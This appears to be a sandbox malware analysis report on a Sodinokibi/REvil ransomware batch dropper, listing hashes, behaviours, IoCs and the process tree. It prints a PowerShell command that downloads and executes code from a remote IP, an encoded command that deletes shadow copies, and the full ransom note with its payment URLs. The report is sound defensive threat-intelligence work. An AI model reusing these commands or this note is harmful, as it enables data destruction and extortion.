Overview

overview

10

Static

static

d414776d82...94.bat

windows7_x64

10

d414776d82...94.bat

windows10_x64

10

Analysis

  • max time kernel
    132s
  • max time network
    54s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    15-05-2020 19:19

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    d414776d8291887b69e7e08716350a94.bat

  • Size

    216B

  • MD5

    44b1551634044bfd5c2101792984ab6a

  • SHA1

    c1c890dd032188b9c1488e5cf4ff4f22d88b74e5

  • SHA256

    d3acbb0ddca79d785f4a3c766cceeb94bc468b19bfa0ba495af8182fbd9c55a4

  • SHA512

    faae8800cab7d6fa3470130c293609b65607156bcb9403ac83e9cd20a4dfeea2c689287b066320dd344415d189fe9d01f2a2913f1d51c008da36b18a62bbd677

Score
10/10
ransomwarepersistencesodinokibi

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/d414776d8291887b69e7e08716350a94

Extracted

Path

C:\3uxah42q-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 3uxah42q. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B5B9A722923F5083 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/B5B9A722923F5083 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: VYG70WUZy3kEjpHqU7QmrEsZvjO/SRI5NDyPznTcEXekF6anHdaLyTCrVV8u6JzD MyMlPlR8M45R0Pik7XTMk193T+VbVs9pRvFf+cMw30CbQLGMOUxMWq3QkNUSxw9p Ho4SAts+zkg25HJMQJ/mj4U5X2oQb+oyG7K4C9hRVvLR/DW2yGtfBPkgD5w3KeVD xG8+kyxN5iWa2iIorsjWZfkaHim2y0E0bMMz5DuKwDFy+TglDj00gKWAdex3ZSyH vpJLxWAM/rwZngy98I0Oyz1n0UxmmxwqxzynLElOPMqxnvlBlqceuAAEBJRC3u/L aoJAKgcBeX768957DWlJ71PgEsbd7e591RNiDOTRdT+157xNSZM8ODz952N1dnd2 vQtIGI8SyLvZMuFqHVB4N9VbAjQ8ulicfJjBUcLeaaODlbw2rVPwZVBVWjrkRXgd Z1JrpY1j+ihevU4CAR66AsMS7l0mv3MoMG/54HonSjVjaSTOaUGMmHj5AvB7r/R5 dJPfYDNjDgizDNpiutJGuxcq5bO5uTE0b91jqOEkS7A1rjFGIcmydL2xIIkMXL5+ 9limun1yuPlcOrZJU5DB0hlFVxcoBznVB6cn7qEAZ5/2JZGZQh1zlqnvB+8Vyzqa ZDTpjx5kK+j3uvmel5Dme5xtnlCr9i1ucIO2viMIGhUlmgXLIXFfQStP79VlFUJi 6K1ot3ifnoINMie3+2FZtccgmpcpOMf9b14xe5Zzo7u0gv1INYgNGbXoWmYGgahS JAdtvA4GGYkxJhdLw1X+nKQIrtW30FSXS1TJ0Bcz85faquj5pAIcdmU3LhKt5CvM VIDk4emJCRsKMAM9BGzmMbu/TUDSNy3Vw3DrW+5kKVFgc5Timw/qVXq62WHij1Hr 9p1OAkj8N1ijVOivZXzxZqn5EOuKLZs6jacMzKqobTQ5LB7PSxI6AhOlmeRfXVWW HljmGUU7AtoZdFbGOMoWJn2FQkYE+u+u+kKlaGUR8xUl7SuD7GyoCRVeDstajAQ2 Emf/m46vK6wm49rq0AwFHYivBu8alXNG1zmi9nGTD6Y9KnY4jkgmLwi44Oy4inK+ ZbzwAwqIy/8BRPqmzbVP83n4qNvWVcTMzuCAzG1OeylHeLjmKI1YAug+0v/i+NES 0/M03ID8bvoyxvO33F8tb3imAUkRlK9+2n/PVuKj4KzkU2EEJ0vUHTL3Gnr44Fjt uK5NdxkRoh39Eeew3S3218jCcrhrag5xVV+Bx7WCq8nsPG+30BX/HFeMPMCKKXIg vzFew25oFpd2w++6HKK2TFKc4hIp5I3g3/B1CIGDFi1J2+Ju ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B5B9A722923F5083

http://decryptor.cc/B5B9A722923F5083

Signatures

  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Enumerates connected drives 3 TTPs
  • Modifies service 2 TTPs 4 IoCs
    persistence
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 42 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Blacklisted process makes network request 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\d414776d8291887b69e7e08716350a94.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1440
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/d414776d8291887b69e7e08716350a94');Invoke-IDZVZHFEB;Start-Sleep -s 10000"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of WriteProcessMemory
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      PID:884
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:524
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Modifies service
    PID:1676

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Download Submit